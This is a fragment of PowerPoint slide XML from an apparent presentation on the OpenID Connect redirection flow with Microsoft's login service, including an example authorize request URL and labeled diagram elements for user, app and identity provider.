              <p:spPr>
                <a:xfrm>
                  <a:off x="5635800" y="2887661"/>
                  <a:ext cx="4320000" cy="720000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A77EF60-A313-4E67-9392-5D480E45353E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5514488" y="2405875"/>
                  <a:ext cx="4320000" cy="72000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20447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App -&gt; Resource Provider</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="Graphic 43" descr="Internet">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD25E036-84CB-4F53-8EDD-8A3973A89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339171" y="1592257"/>
                <a:ext cx="1643717" cy="1643715"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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952C1F-9D21-461C-B8FF-68A26EC3CF6F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2482535" y="2234302"/>
              <a:ext cx="2593180" cy="228018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12D1DF4-90C6-45DB-B7BA-A78A39B4F63B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2482535" y="721814"/>
              <a:ext cx="2761065" cy="15124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 descr="Employee Badge">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{165AD52F-B220-4EAA-81EC-373F02875910}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6243477" y="4115253"/>
              <a:ext cx="261008" cy="23396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 50" descr="Employee Badge">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93DF7BDB-9A6A-4096-A20A-8B72B7E0E879}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6243477" y="282697"/>
              <a:ext cx="261008" cy="23396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1250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70F7D-6D34-45C8-8A27-305EF768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29884"/>
            <a:ext cx="4520824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Authentication flow: Redirection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246282-59E8-4615-BEF7-EDF9D7735383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4529824" y="147845"/>
            <a:ext cx="3060785" cy="2210185"/>
            <a:chOff x="7732721" y="1592258"/>
            <a:chExt cx="3060785" cy="221018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A31DD7F-417E-4A9A-BF23-EB5BCA3F9312}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7732721" y="2931033"/>
              <a:ext cx="3060785" cy="871410"/>
              <a:chOff x="5537562" y="2412785"/>
              <a:chExt cx="4418238" cy="119487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6932B3-9D8E-4334-8CD6-3F55CED51675}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5635800" y="2887661"/>
                <a:ext cx="432000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69263B-F84F-4244-9A61-7896E5A4E405}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5537562" y="2412785"/>
                <a:ext cx="43200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20447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/>
                  <a:t>App -&gt; Resource Provider</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Graphic 34" descr="Internet">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A769F7D-54CA-4F09-9FDF-B56856B08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39171" y="1592258"/>
              <a:ext cx="1643716" cy="1643716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9158BA-FF05-4F4C-A09E-02AF1826A450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8748812" y="250459"/>
            <a:ext cx="2903675" cy="2376779"/>
            <a:chOff x="8417380" y="231785"/>
            <a:chExt cx="2903675" cy="2376779"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 36" descr="Employee Badge">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C588004-0571-4F5C-924D-413041EA0A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9211979" y="231785"/>
              <a:ext cx="1300252" cy="1300252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50C242E-BA1A-4D28-AF67-E776CE18277A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8417380" y="1416721"/>
              <a:ext cx="2903675" cy="1191843"/>
              <a:chOff x="7208178" y="2037033"/>
              <a:chExt cx="2903675" cy="119184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8A23B63-2FBD-4A4D-B59D-C1B06CB7F4DA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7208178" y="2508876"/>
                <a:ext cx="288945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60D276-7E12-4136-A5FE-91C69887ED2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7222403" y="2037033"/>
                <a:ext cx="288945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/>
                  <a:t>Identity Provider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1D077E-ECA7-40FB-AAD7-A267A8CC1896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1819195" y="2488677"/>
            <a:ext cx="2845184" cy="369332"/>
            <a:chOff x="1855054" y="3516868"/>
            <a:chExt cx="2845184" cy="36933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EF5A132-9165-4D4A-9B60-0FA0A08CB912}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1855054" y="3886200"/>
              <a:ext cx="284518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A13C17-1BC9-40C0-AF1F-65AB81477663}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2422027" y="3516868"/>
              <a:ext cx="1790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portal.office.com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675458-2F5A-44F2-809C-0D2970AA2A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6874905" y="2488677"/>
            <a:ext cx="5169681" cy="2843725"/>
            <a:chOff x="6874905" y="2488677"/>
            <a:chExt cx="5169681" cy="28437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59C4E7-E532-4F7F-B453-C9B7ED250A34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6874905" y="2488677"/>
              <a:ext cx="2845184" cy="382779"/>
              <a:chOff x="6910764" y="3516868"/>
              <a:chExt cx="2845184" cy="382779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1B1DFA8-127F-418B-ADA6-19C55464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0764" y="3899647"/>
                <a:ext cx="284518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D4B8F2-54A6-49C9-8E73-CBB6D94055BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6910764" y="3516868"/>
                <a:ext cx="263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login.microsoftonline.com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0BCFE7-9ADF-4887-B3B6-C485D1C87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74905" y="3035759"/>
              <a:ext cx="5169681" cy="229664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2EABAC-0BEC-4F28-8B3E-76D08ECE157B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4915303" y="2507887"/>
            <a:ext cx="1596384" cy="728262"/>
            <a:chOff x="4629818" y="2346394"/>
            <a:chExt cx="2187967" cy="1006933"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Graphic 43" descr="Question mark">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726F33D9-723C-4F42-A5DE-4042DB16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9818" y="2388379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Raised hand">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2778A5F-1F5F-438F-A031-AC54B390A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37973" y="2346394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Right pointing backhand index ">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABADD03D-4076-452B-BEEE-15EB396F3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03385" y="2438927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35AC47-CA00-4011-9DE3-BDD7A17F16B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="220498" y="271653"/>
            <a:ext cx="3060820" cy="2401690"/>
            <a:chOff x="1398000" y="1861825"/>
            <a:chExt cx="4345986" cy="3134349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51" descr="Target Audience">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71DC84B9-AF5C-4F5E-B7D4-84810A919862}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2586000" y="1861825"/>
              <a:ext cx="1944000" cy="1944000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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6A59868-EE5F-4551-8640-3C72BC64C90B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398000" y="3533005"/>
              <a:ext cx="4345986" cy="1463169"/>
              <a:chOff x="559800" y="2144492"/>
              <a:chExt cx="4345986" cy="146316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FC472D1-2FE1-4F5A-8AB3-60C9A61A4B4A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="559800" y="2887661"/>
                <a:ext cx="432000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6E6D49-8081-489C-BC2D-2C50CDD758F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="585786" y="2144492"/>
                <a:ext cx="43200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20447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/>
                  <a:t>User</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="4600" kern="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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B1D2664F-907F-4903-9E27-8FFA4011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16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32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70F7D-6D34-45C8-8A27-305EF768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4595394" cy="1096331"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication flow: Redirection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70BBF-D14D-4835-A513-11E1621E5A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518486" y="254664"/>
            <a:ext cx="115525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https://login.microsoftonline.com/common/oauth2/authorize?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222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client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222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=00000006-0000-0ff1-ce00-000000000000</a:t>
            </a:r>
          </a:p>
          <a:p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</a:rPr>
              <a:t>scope=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openid</a:t>
            </a:r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</a:rPr>
              <a:t> profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222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response_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222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222222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code+id_token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill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2222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response_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="22222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=query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OpenIdConnect.AuthenticationProperties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=myr2HdbOy[…]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mwc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nonce=63[…]dh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222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redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222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=https://portal.office.com/landing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222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A437E2-2EB9-48B1-A717-7C196E27F58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="111186" y="3058827"/>
            <a:ext cx="2027797" cy="1796219"/>
            <a:chOff x="4526446" y="1831499"/>
            <a:chExt cx="3116429" cy="31950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2AAD69-D1EB-44E9-AFA0-CFCDD5774631}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5152407" y="1831499"/>
              <a:ext cx="1887187" cy="188718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339FECA-7D3F-4422-B1F1-2BDA14F4126C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4526446" y="3835353"/>
              <a:ext cx="3116429" cy="1191147"/>
              <a:chOff x="53089" y="2446840"/>
              <a:chExt cx="3116429" cy="119114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4B796F0-5E6A-4D49-9CF8-7AEC4BE7CD67}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="75768" y="2917987"/>
                <a:ext cx="309375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015C9D-52D8-4433-91D2-CC14FC97DB45}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="53089" y="2446840"/>
                <a:ext cx="3093750" cy="10081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10223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1400" dirty="0"/>
                  <a:t>Auth</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
                  <a:t> Protocol</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="10223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1400" dirty="0">
                    <a:highlight>
                      <a:srgbClr val="FFFF00"/>
                    </a:highlight>
                  </a:rPr>
                  <a:t>OpenID</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight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641747-74C0-403D-A8D8-32521BC75D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1898840" y="3058827"/>
            <a:ext cx="2027797" cy="1796219"/>
            <a:chOff x="2118843" y="3513039"/>
            <a:chExt cx="2027797" cy="179621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BCE5291-1ECF-4936-9A29-C278F6BD7CA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2118843" y="3513039"/>
              <a:ext cx="2027797" cy="1796219"/>
              <a:chOff x="4526446" y="1831499"/>
              <a:chExt cx="3116429" cy="3195001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C3BE870-9C96-41A3-B9CA-8CA626A8DA04}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5152407" y="1831499"/>
                <a:ext cx="1887187" cy="1887188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C1C5D91-0A7B-4423-9E64-0D5D6FD95395}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4526446" y="3835353"/>
                <a:ext cx="3116429" cy="1191147"/>
                <a:chOff x="53089" y="2446840"/>
                <a:chExt cx="3116429" cy="1191147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435B6A8-D5BB-49D5-AFDC-6D8DD51FBBD3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="75768" y="2917987"/>
                  <a:ext cx="3093750" cy="720000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95996B8-38C5-45A2-AAED-F549DA4057CD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="53089" y="2446840"/>
                  <a:ext cx="3093750" cy="100811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102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200"/>
                    <a:t>Application Identifier</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400">
                      <a:highlight>
                        <a:srgbClr val="00FF00"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>Portal.office.com</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="1400" kern="1200">
                    <a:highlight>
                      <a:srgbClr val="00FF00"/>
                    </a:highlight>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Rectangle 69" descr="Smart Phone">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095B61D4-A6C3-44F5-AA6F-69A8B0DA02CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2760389" y="3740943"/>
              <a:ext cx="765728" cy="66371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2CF440-D0A6-4CCB-B9EC-39A2A38EC23C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7983913" y="3030303"/>
            <a:ext cx="2027797" cy="1814197"/>
            <a:chOff x="4161397" y="3500705"/>
            <a:chExt cx="2027797" cy="181419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F6E09B2-9308-4908-9785-3195BA5560AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4161397" y="3518683"/>
              <a:ext cx="2027797" cy="1796219"/>
              <a:chOff x="4526446" y="1831499"/>
              <a:chExt cx="3116429" cy="3195001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F8C8F56-FE5C-42AC-83C4-130E281444EC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5152407" y="1831499"/>
                <a:ext cx="1887187" cy="1887188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A534EDE-3DA7-42F2-91B0-CDF2729732E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4526446" y="3835353"/>
                <a:ext cx="3116429" cy="1191147"/>
                <a:chOff x="53089" y="2446840"/>
                <a:chExt cx="3116429" cy="1191147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BF8935F-7E5A-46F5-9DB3-FF752FC0C2F6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="75768" y="2917987"/>
                  <a:ext cx="3093750" cy="720000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DDA17DF-98EF-4EE0-A16C-96E5DA266C2A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="53089" y="2446840"/>
                  <a:ext cx="3093750" cy="100811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102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200"/>
                    <a:t>How to respond?</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400">
                      <a:highlight>
                        <a:srgbClr val="00FFFF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>[</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" err="1">
                      <a:highlight>
                        <a:srgbClr val="00FFFF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>POST|FRAGMENT|query</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400">
                      <a:highlight>
                        <a:srgbClr val="00FFFF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>]</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="1400" kern="1200">
                    <a:highlight>
                      <a:srgbClr val="00FFFF"/>
                    </a:highlight>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 80" descr="Siren">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E8EB38-E88C-4421-986D-6589FC5BFB78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4721097" y="3500705"/>
              <a:ext cx="934779" cy="997782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9BD131-8BBC-4F73-8B43-941D5BF4FD85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5784120" y="3058827"/>
            <a:ext cx="2027797" cy="1796219"/>
            <a:chOff x="6341594" y="3513039"/>
            <a:chExt cx="2027797" cy="179621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44A4B9C-E5B9-415F-9088-5F7DE3154D2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6341594" y="3513039"/>
              <a:ext cx="2027797" cy="1796219"/>
              <a:chOff x="4526446" y="1831499"/>
              <a:chExt cx="3116429" cy="3195001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7F8242C-7236-49B8-B9FD-ABEB756DA771}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5152407" y="1831499"/>
                <a:ext cx="1887187" cy="1887188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219CE9B-209C-4957-8936-2E8E82CDBCA3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4526446" y="3835353"/>
                <a:ext cx="3116429" cy="1191147"/>
                <a:chOff x="53089" y="2446840"/>
                <a:chExt cx="3116429" cy="1191147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CB8B2A-0234-4729-B48F-C205B7CF2807}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="75768" y="2917987"/>
                  <a:ext cx="3093750" cy="720000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9F1AAD-943E-4039-823D-1B4B0F8DF807}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="53089" y="2446840"/>
                  <a:ext cx="3093750" cy="100811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102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200"/>
                    <a:t>What to respond?</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400">
                      <a:highlight>
                        <a:srgbClr val="FF00FF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>[</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" err="1">
                      <a:highlight>
                        <a:srgbClr val="FF00FF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>code|Identifier|token</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400">
                      <a:highlight>
                        <a:srgbClr val="FF00FF"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>]</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="1400" kern="1200">
                    <a:highlight>
                      <a:srgbClr val="FF00FF"/>
                    </a:highlight>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Rectangle 82" descr="Coins">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29296913-3AD7-47B1-B751-453825D225EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7014404" y="3587900"/>
              <a:ext cx="772938" cy="843819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9733F2-9A91-45D7-91A9-CDEBABFD3B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3722712" y="3070101"/>
